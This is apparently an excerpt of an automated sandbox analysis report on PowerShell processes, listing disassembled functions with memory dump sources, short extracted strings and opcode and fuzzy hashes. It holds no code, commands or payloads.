                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34230000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a5755679a9d0682f244010a4aaffaebbf5923e0e34fbd5c3b74169e552e8a3ff
                                                                                                                                        • Instruction ID: 6d47963923a312abdf5d99b55104d2781b0e665807c115f28c1facee9c214d45
                                                                                                                                        • Opcode Fuzzy Hash: a5755679a9d0682f244010a4aaffaebbf5923e0e34fbd5c3b74169e552e8a3ff
                                                                                                                                        • Instruction Fuzzy Hash: 6251619BA0D7D21FE76386685CB60A52FF4EF5326470940F7C6C5DE093ED1E1807A622
                                                                                                                                        Function 00007FFD3430A684 Relevance: 10.3, Strings: 8, Instructions: 330COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: XRG4$XRG4$XRG4$XRG4$XRG4$XRG4$XRG4$XRG4
                                                                                                                                        • API String ID: 0-78127727
                                                                                                                                        • Opcode ID: ea1d7cd351838c152c092953bc78e6c3f8277440c0c5b18097acd8a418dc527a
                                                                                                                                        • Instruction ID: 069fa3bfbb6e5b4b77bbe85e22d19a131500745cd1c97bd4e7ea1e24d800b804
                                                                                                                                        • Opcode Fuzzy Hash: ea1d7cd351838c152c092953bc78e6c3f8277440c0c5b18097acd8a418dc527a
                                                                                                                                        • Instruction Fuzzy Hash: 06B11772A4DA850FE7A5FB6898A51687BE1EF66310F1802BED14DD71C3DD2CAC4AC341
                                                                                                                                        Function 00007FFD34309E74 Relevance: 10.3, Strings: 8, Instructions: 326COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000005.00000002.2352162775.00007FFD34300000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34300000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_5_2_7ffd34300000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: QG4$QG4$QG4$QG4$QG4$QG4$QG4$QG4
                                                                                                                                        • API String ID: 0-177947313
                                                                                                                                        • Opcode ID: 006b5090aacdeffd63a578f0c95161886ea98b842b3b9d881f4a56a65f3442b2
                                                                                                                                        • Instruction ID: 74e1ee14abe8f584341f4634f554a709cd931b8393e84988ab4b11950c68e7ec
                                                                                                                                        • Opcode Fuzzy Hash: 006b5090aacdeffd63a578f0c95161886ea98b842b3b9d881f4a56a65f3442b2
                                                                                                                                        • Instruction Fuzzy Hash: 4DB11572A0DA890FE795FB6898A12A87BD1EF56310F1801BEE09DD71C3DD2DAC49C741

                                                                                                                                        Executed Functions

                                                                                                                                        Function 07845B88 Relevance: 6.5, Strings: 5, Instructions: 275COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$(fRl$(fRl$x.Ck
                                                                                                                                        • API String ID: 0-1034491878
                                                                                                                                        • Opcode ID: f09c1d5cbb9aa47e09ad1af929282190c8b8e592b260d25bb276efc5728677b6
                                                                                                                                        • Instruction ID: f7ad3e09bf54612c96d9d91243ee5c4b607a645a146aac21306525adcce97882
                                                                                                                                        • Opcode Fuzzy Hash: f09c1d5cbb9aa47e09ad1af929282190c8b8e592b260d25bb276efc5728677b6
                                                                                                                                        • Instruction Fuzzy Hash: BCB1AFB0B00209DBE714DFA8C859B6EBBE2AFC8314F148069D501EF795CBB5EC418B95
                                                                                                                                        Function 07847378 Relevance: 10.3, Strings: 8, Instructions: 305COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$(fRl$(fRl$(fRl$(fRl$(fRl$(fRl
                                                                                                                                        • API String ID: 0-3508488776
                                                                                                                                        • Opcode ID: 4c477975f9d2000778d8217d1e7559abef515d957e65968d7c6c6be4b3ee72c0
                                                                                                                                        • Instruction ID: 5f7415143ae868bdb6b1840aa26df9b9ca67513656b5249f5f66bb666a6fe5ff
                                                                                                                                        • Opcode Fuzzy Hash: 4c477975f9d2000778d8217d1e7559abef515d957e65968d7c6c6be4b3ee72c0
                                                                                                                                        • Instruction Fuzzy Hash: 5FC181B0E00209DBDB24DFA8C811A6ABBE3BFD5714F148429D905EB744CBB6EC41CB91
                                                                                                                                        Function 078464E0 Relevance: 8.1, Strings: 6, Instructions: 618COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$(fRl$(fRl$x.Ck$-Ck
                                                                                                                                        • API String ID: 0-209153812
                                                                                                                                        • Opcode ID: fd62e135148f951170aca625223eb280889e6e9fbc1be31dffa67f3a7207bd65
                                                                                                                                        • Instruction ID: f2447d988eb36dae93e70504e5890e379463a21bd5b809440b17dbe7cd2087af
                                                                                                                                        • Opcode Fuzzy Hash: fd62e135148f951170aca625223eb280889e6e9fbc1be31dffa67f3a7207bd65
                                                                                                                                        • Instruction Fuzzy Hash: 7F42B0B4A00219DFDB24CF58C850B6ABBB2FF85714F148599D905AB785CBB2EC42CF91
                                                                                                                                        Function 07846F93 Relevance: 6.7, Strings: 5, Instructions: 450COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$(fRl$(fRl$(fRl
                                                                                                                                        • API String ID: 0-1167094415
                                                                                                                                        • Opcode ID: de30ec1fef0609c8e926f7c82248d0ae670742d68e8811c49889d45e641f77aa
                                                                                                                                        • Instruction ID: eecb33515021b8c94f1e6abd97b032b0654bca5e6ac3f04c6759304bce399fde
                                                                                                                                        • Opcode Fuzzy Hash: de30ec1fef0609c8e926f7c82248d0ae670742d68e8811c49889d45e641f77aa
                                                                                                                                        • Instruction Fuzzy Hash: 65028DB4A00219DFDB24CF58C840E6ABBB2FF99714F14C599D906AB745CBB2EC41CB91
                                                                                                                                        Function 078469A3 Relevance: 6.6, Strings: 5, Instructions: 395COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$x.Ck$x.Ck$-Ck
                                                                                                                                        • API String ID: 0-989430743
                                                                                                                                        • Opcode ID: d1e6145c729694828f71251ac3109393553047d9d3cc33a1993f642e19f8a1fc
                                                                                                                                        • Instruction ID: 5b2031ff0fe11ddc827585aa74db9e5fbf8e18f7c4b97e106b3f8890e5ebda9d
                                                                                                                                        • Opcode Fuzzy Hash: d1e6145c729694828f71251ac3109393553047d9d3cc33a1993f642e19f8a1fc
                                                                                                                                        • Instruction Fuzzy Hash: ECF1C0B0B00219DFEB24DB68CC54F5ABBA2AFC4340F1480A9E609AF795DBB5DD418F51
                                                                                                                                        Function 078442F8 Relevance: 5.7, Strings: 4, Instructions: 742COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$(fRl$(fRl
                                                                                                                                        • API String ID: 0-3082660454
                                                                                                                                        • Opcode ID: 579c01befffbb1aa3a5ff16e8220654448e3bd6e4e7de618413946a9f8f29483
                                                                                                                                        • Instruction ID: 22d88d88c29a94a8fcf018013cee474ad163f4c599aad65df040e19b7a2cf858
                                                                                                                                        • Opcode Fuzzy Hash: 579c01befffbb1aa3a5ff16e8220654448e3bd6e4e7de618413946a9f8f29483
                                                                                                                                        • Instruction Fuzzy Hash: 206229B4A00249DFD714CF98C445F5EBBB2AFC5718F148069E9099B756CBB2EC428B91
                                                                                                                                        Function 07841020 Relevance: 4.2, Strings: 3, Instructions: 422COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$`BDk
                                                                                                                                        • API String ID: 0-2608190188
                                                                                                                                        • Opcode ID: eb49a757a8a8be18b8d0d4d42e930de6d151e8e64634cd83dd0317e28fdb8132
                                                                                                                                        • Instruction ID: f23dd5c52137f6b16cee90232565c69f5cb90b7e9837eb871a77ed0b27698144
                                                                                                                                        • Opcode Fuzzy Hash: eb49a757a8a8be18b8d0d4d42e930de6d151e8e64634cd83dd0317e28fdb8132
                                                                                                                                        • Instruction Fuzzy Hash: 94F138B4E0020DDFD714CF98C449E6ABBF2AF99714F188069E9059B751CBB2ED828B51
                                                                                                                                        Function 07845B69 Relevance: 4.0, Strings: 3, Instructions: 253COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl$x.Ck
                                                                                                                                        • API String ID: 0-5507359
                                                                                                                                        • Opcode ID: d4ee1b131e3127aa9f99eea97a29568b0fd9bd9dd97c285c64e73f58caacec60
                                                                                                                                        • Instruction ID: 7f3a83757c451e48dbcd89895d5aea5e1653acd49632c5930270ebecdd362702
                                                                                                                                        • Opcode Fuzzy Hash: d4ee1b131e3127aa9f99eea97a29568b0fd9bd9dd97c285c64e73f58caacec60
                                                                                                                                        • Instruction Fuzzy Hash: 4EA19DB0A00209DBDB14CF54C855BAEBBF2AF99314F148069E505EB792CBB6EC41CB55
                                                                                                                                        Function 078442D9 Relevance: 3.2, Strings: 2, Instructions: 663COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl$(fRl
                                                                                                                                        • API String ID: 0-3553362356
                                                                                                                                        • Opcode ID: 67f5413604d6e0bf9e3123eda3a4fd047a727e53dda995812dc9c8fb87ac58ca
                                                                                                                                        • Instruction ID: 8f22520332d8df43800abe0bc1e1838a53843c7960debc3357eb4f587307e911
                                                                                                                                        • Opcode Fuzzy Hash: 67f5413604d6e0bf9e3123eda3a4fd047a727e53dda995812dc9c8fb87ac58ca
                                                                                                                                        • Instruction Fuzzy Hash: CC523AB4A0024ADFD714CF98C445F9DBBB2BF95718F188059E909AB352CBB2EC42CB41
                                                                                                                                        Function 078477B0 Relevance: 2.8, Strings: 2, Instructions: 339COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: x.Ck$-Ck
                                                                                                                                        • API String ID: 0-2225241833
                                                                                                                                        • Opcode ID: 10f3d842164dbeafd563aeff637023f8142d9166e2ad4e08227af4741702db7c
                                                                                                                                        • Instruction ID: 4785e4a029a7f7f26c2aec21c7a35306bfbbb6320c50014b514162ea84db66e8
                                                                                                                                        • Opcode Fuzzy Hash: 10f3d842164dbeafd563aeff637023f8142d9166e2ad4e08227af4741702db7c
                                                                                                                                        • Instruction Fuzzy Hash: 9DD17CB0A00209DFD714DFA8C855FAEBBA3AFD8714F14C029D501AF795CBB5D8418B96
                                                                                                                                        Function 07842DD8 Relevance: 2.8, Strings: 2, Instructions: 327COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 84Pl$84Pl
                                                                                                                                        • API String ID: 0-4068960660
                                                                                                                                        • Opcode ID: 253a35019b96dd1dba43c6fcd4d1a00a9e4c4b454dff4ac2f8988f1697e70b05
                                                                                                                                        • Instruction ID: 0505d6a3281fec39863ff3b9c42452b017f7906aa25676027f69b6ce3835f587
                                                                                                                                        • Opcode Fuzzy Hash: 253a35019b96dd1dba43c6fcd4d1a00a9e4c4b454dff4ac2f8988f1697e70b05
                                                                                                                                        • Instruction Fuzzy Hash: 77B13771609389DFC7258F68C814B66BFB1BF92214F2881ABE444CF653CBB5C845C7A2
                                                                                                                                        Function 07847790 Relevance: 2.8, Strings: 2, Instructions: 271COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: x.Ck$-Ck
                                                                                                                                        • API String ID: 0-2225241833
                                                                                                                                        • Opcode ID: 1abd1ffc04076a13c2a59fe3fedf93f213ae601f1753ac78fe99b005123be395
                                                                                                                                        • Instruction ID: 1722f73d68aae9eb0addb1467331fe9915168a433cfd689fcac3becc00b9a16f
                                                                                                                                        • Opcode Fuzzy Hash: 1abd1ffc04076a13c2a59fe3fedf93f213ae601f1753ac78fe99b005123be395
                                                                                                                                        • Instruction Fuzzy Hash: A5B18CB0A00209DFDB14CF68C845FADBBB2AF98714F15C059D901AF795CBB5E841CB96
                                                                                                                                        Function 07841001 Relevance: 1.6, Strings: 1, Instructions: 376COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: (fRl
                                                                                                                                        • API String ID: 0-3289513466
                                                                                                                                        • Opcode ID: 1486e41636360e1392b149fa43913c18fadd60e3a4a0bc039abfa376597d62fd
                                                                                                                                        • Instruction ID: afc20006c6a9393a03b165bdf9b670ffd57ee462800aacb5ad201af6ad96091e
                                                                                                                                        • Opcode Fuzzy Hash: 1486e41636360e1392b149fa43913c18fadd60e3a4a0bc039abfa376597d62fd
                                                                                                                                        • Instruction Fuzzy Hash: D9E128B4E0020DDFD714CF98C549EAABBB2AF99714F18C069E819AB351C772ED81CB51
                                                                                                                                        Function 07841493 Relevance: 1.4, Strings: 1, Instructions: 156COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: h2Ek
                                                                                                                                        • API String ID: 0-2941727390
                                                                                                                                        • Opcode ID: af21fdb2c4b05e7788b2c40cae6cedd6956cc7ffb5089d7951f37b0e5c5e3719
                                                                                                                                        • Instruction ID: 5ddbde070b1e3e647b18bd2dacaf996b10a7fb4539284cb1d3f85adb975e8a66
                                                                                                                                        • Opcode Fuzzy Hash: af21fdb2c4b05e7788b2c40cae6cedd6956cc7ffb5089d7951f37b0e5c5e3719
                                                                                                                                        • Instruction Fuzzy Hash: F651B2B4F0020DEBDB24CE58C444BA9B7A2AFD5758F158069E806DB341DBB2DD81CB51
                                                                                                                                        Function 07847BD6 Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: x.Ck
                                                                                                                                        • API String ID: 0-3156777107
                                                                                                                                        • Opcode ID: aab7ce01872bfa138dcfd1a6b6c90735e8701750a2d0a53b0e2762a8598bd2e0
                                                                                                                                        • Instruction ID: 96e6ee72cfb7431a83c384c7c166b1941a6eecdd9acb39e6e8c99b198bb4b663
                                                                                                                                        • Opcode Fuzzy Hash: aab7ce01872bfa138dcfd1a6b6c90735e8701750a2d0a53b0e2762a8598bd2e0
                                                                                                                                        • Instruction Fuzzy Hash: 1C319874B00218EBE7149BA4C859F6E76A3AFC4754F14C029EA01AF795CFB6DC418BD2
                                                                                                                                        Function 07844AEF Relevance: .2, Instructions: 184COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 16a627c7f4acde3860b55ee4b20782d84eb58456c07520c26b146db84ef25156
                                                                                                                                        • Instruction ID: 6e98f334467709727274f13180e614b74616343def6a4153c1ba62967f09cf30
                                                                                                                                        • Opcode Fuzzy Hash: 16a627c7f4acde3860b55ee4b20782d84eb58456c07520c26b146db84ef25156
                                                                                                                                        • Instruction Fuzzy Hash: 3C715CB4A0024ADFD724CF94C445F69BBB2AF95714F188459E9099F351CBB2EC42CB51
                                                                                                                                        Function 0784A0D5 Relevance: .1, Instructions: 131COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 1a07842c832dec23da3dbe9d7ace19b9f3c6ed4ce33f67e89098f2ca2b9b30e6
                                                                                                                                        • Instruction ID: 2885b2e639f5f00e9a2afb987c556e8ac4d34ebdfdeac6b177348e276acaeff7
                                                                                                                                        • Opcode Fuzzy Hash: 1a07842c832dec23da3dbe9d7ace19b9f3c6ed4ce33f67e89098f2ca2b9b30e6
                                                                                                                                        • Instruction Fuzzy Hash: BB4181F1B40219CBEB199BB88815A6EBBA29FE1754704C07AD502DF341DFB5D802C3A3
                                                                                                                                        Function 078404E0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 888a43694e96520e05834278a4389eb64dd3ec58b22b0da03dabc2e8e8175ccb
                                                                                                                                        • Instruction ID: 89f8b144b735ae324d9c9e5358ef5e0586dad17ee7d9d0273b06c8aa25cabf55
                                                                                                                                        • Opcode Fuzzy Hash: 888a43694e96520e05834278a4389eb64dd3ec58b22b0da03dabc2e8e8175ccb
                                                                                                                                        • Instruction Fuzzy Hash: 98413AB2F0021D9BCB249F79880066BF7E5EFD4614B2581AACA45EB345DF71D901C7E1
                                                                                                                                        Function 07840A78 Relevance: .1, Instructions: 94COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: a4b2e09e8f8dece029d05f153e5b81bd22c88974c09235e6412b0c962981d0c8
                                                                                                                                        • Instruction ID: 716d92baa3eb5e35ca24b79deda215c0c8a25de7004f7565d22595fbdec248cf
                                                                                                                                        • Opcode Fuzzy Hash: a4b2e09e8f8dece029d05f153e5b81bd22c88974c09235e6412b0c962981d0c8
                                                                                                                                        • Instruction Fuzzy Hash: 13218EB270030E9BDB249ABA4810B37B69A9FD4719F24847AE705CB2C5CEB5C840C361
                                                                                                                                        Function 07840A64 Relevance: .1, Instructions: 77COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: d357438afa17e7322acc1b717d1b5ab5e4b2712245650ae151968a197f3991be
                                                                                                                                        • Instruction ID: 987cb6f5b4d0cf838f0b0c989eb00a82b6b1182571949d6215f2872c0d851fcd
                                                                                                                                        • Opcode Fuzzy Hash: d357438afa17e7322acc1b717d1b5ab5e4b2712245650ae151968a197f3991be
                                                                                                                                        • Instruction Fuzzy Hash: C021ADB670034A6BDB205AAA4810B737B966FA1314F288466FB45CB2C5DAF8D940C332
                                                                                                                                        Function 078404CB Relevance: .1, Instructions: 72COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 0b408fe392df7b69351350b029314e7e48fd53be5f4fdcd8cdb4066b3f999846
                                                                                                                                        • Instruction ID: b1df5109e8fd3cc856669d3940583be62e68650ccde97ce7bc657378866b6835
                                                                                                                                        • Opcode Fuzzy Hash: 0b408fe392df7b69351350b029314e7e48fd53be5f4fdcd8cdb4066b3f999846
                                                                                                                                        • Instruction Fuzzy Hash: 9D21F6F6D0021DDF8F209E6989402EBB7B4EF59210B2641E7DE08F7205D670D941CBA5
                                                                                                                                        Function 0784048A Relevance: .1, Instructions: 67COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: bb8e5a4a3dfb5ea090e203f525b59f4c136862f37917ce49743fd1fcf40e2ff1
                                                                                                                                        • Instruction ID: 045b83c6e3f183eef77b387e02aa600004b080fdbc7c4c312879c514af8c36e0
                                                                                                                                        • Opcode Fuzzy Hash: bb8e5a4a3dfb5ea090e203f525b59f4c136862f37917ce49743fd1fcf40e2ff1
                                                                                                                                        • Instruction Fuzzy Hash: AC1106F6B0011DDB8F249E58954016AF3A5FFA822172681ABCE09FB205C771D951C7A5
                                                                                                                                        Function 07840668 Relevance: .1, Instructions: 52COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: adafabb86e75fdb603208e5ef43aa88237b13e26be4b30ba0c0ee5dd743fc489
                                                                                                                                        • Instruction ID: 15fde14614477a38c21d3e8be979214056ca2eeb4b3d4dcfc2736795db224e12
                                                                                                                                        • Opcode Fuzzy Hash: adafabb86e75fdb603208e5ef43aa88237b13e26be4b30ba0c0ee5dd743fc489
                                                                                                                                        • Instruction Fuzzy Hash: 62014C7730031EAFC72099A9D400677F7959BE5226F14C07BEA4AC7640D6B1C405CB60
                                                                                                                                        Function 07842FBC Relevance: .0, Instructions: 27COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2572544220.0000000007840000.00000040.00000800.00020000.00000000.sdmp, Offset: 07840000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_7840000_powershell.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 02806cb9d09a1748dad8d86a3258442513e2f4d57580f598ddb1eb67462140a5
                                                                                                                                        • Instruction ID: ae1662452c88889510f633e4edef4d707cf56d8964290ab00c7f79d20d5be032
                                                                                                                                        • Opcode Fuzzy Hash: 02806cb9d09a1748dad8d86a3258442513e2f4d57580f598ddb1eb67462140a5
